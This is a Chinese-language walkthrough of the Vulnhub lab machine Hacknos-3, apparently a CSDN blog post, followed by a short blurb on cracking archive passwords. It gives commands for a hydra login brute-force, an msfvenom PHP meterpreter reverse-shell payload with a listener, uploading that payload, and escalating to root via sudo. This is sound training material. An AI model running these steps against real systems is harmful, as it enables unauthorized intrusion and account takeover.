Hacknos-3

实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台

实验网络:桥接网络

实验目标:获取靶机的Root权限

难易程度:简单

一 部署环境

1:下载Virtualbox虚拟化软件

2:下载目标靶机 hacknos3 并导入Virtualbox

Os-hackNos-3.ova 需要修改的内容

3:kal改成桥接

二 测试步骤

第一步:信息收集

步骤一:发现主机

arp-scan -l

步骤二:进行目录遍历 访问/tsweb

dirb http://192.168.0.101/

步骤三:访问scripts发现没用

步骤四:发现首页下面有一个websec 访问试一下

步骤五:遍历websec 访问admin和login 发现相同 进行登录

dirb http://192.168.0.100/websec

步骤六: 在刚开始的首页发先有地址contact@hacknos.com 猜测为登录名使用cewl工具对其网站信息进行收集并制作成字典

cewl http://192.168.0.101/websec/websec > cewl.txt

步骤七:使用hydra进行密码破解 并进行登录

hydra -l contact@hacknos.com -P cewl.txt  192.168.0.101 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V

登录名 contact@hacknos.com  
登陆密码  Securityx

第二步:漏洞利用 获取webshell

步骤一:在界面 发现上传文件的地方 利用msf生成木马并且msf开启监听

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 R > shll.php  //生成木马


//msf开启监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 4444
run

步骤二:将生成的msf木马上传到tmp的php.php中并保存

步骤三:通过python获取tty

python -c 'import pty;pty.spawn("/bin/bash")'

步骤四:获取到第一个flag

第三步:权限提升

步骤一:查看是否有可利用的提权文件或者看能否sudo

find / -perm -4000 -type f 2>/dev/null

步骤二:发现并没有可利用的,查看受否存用户 在home下发现存在blackdevil

步骤三:在/var/local/database 发现加密值 进行破解

破解网站
https://www.spammimic.com/spreadsheet.php?action=decode

登录名     blackdevil
密码   Security@x@

步骤四:登录blackdevil 密码Security 切换权限为root

su blackdevil   //切换用户为blackdevil
sudo su    //切换为root权限

步骤五:获取flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
要在Windows上进行压缩包的爆破,您可以使用工具rarcrack。rarcrack可以指定要爆破的文件类型,如rar、zip、7z,并可以定义最大长度等参数。它最大支持12线程来加速爆破过程。使用命令rarcrack [压缩包路径 -threads 12 -type [压缩包类型可以进行爆破操作。然而,需要注意的是,爆破过程可能需要一定的时间,并且并不保证一定能成功破解密码。有时候可能会出现没有结果或速度较慢的情况。另外,如果您需要爆破zip压缩包,您还可以使用工具fcrackzip。使用命令fcrackzip [压缩包路径可以进行zip压缩包的爆破。 [2] 引用 > [保存密码哈希的文件可以提取密码哈希。然后使用John the Ripper等工具进行破解。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [如何才能简洁高效不失优雅的爆破ZIP文件?](https://blog.csdn.net/zxsctf/article/details/131356650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOSOS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值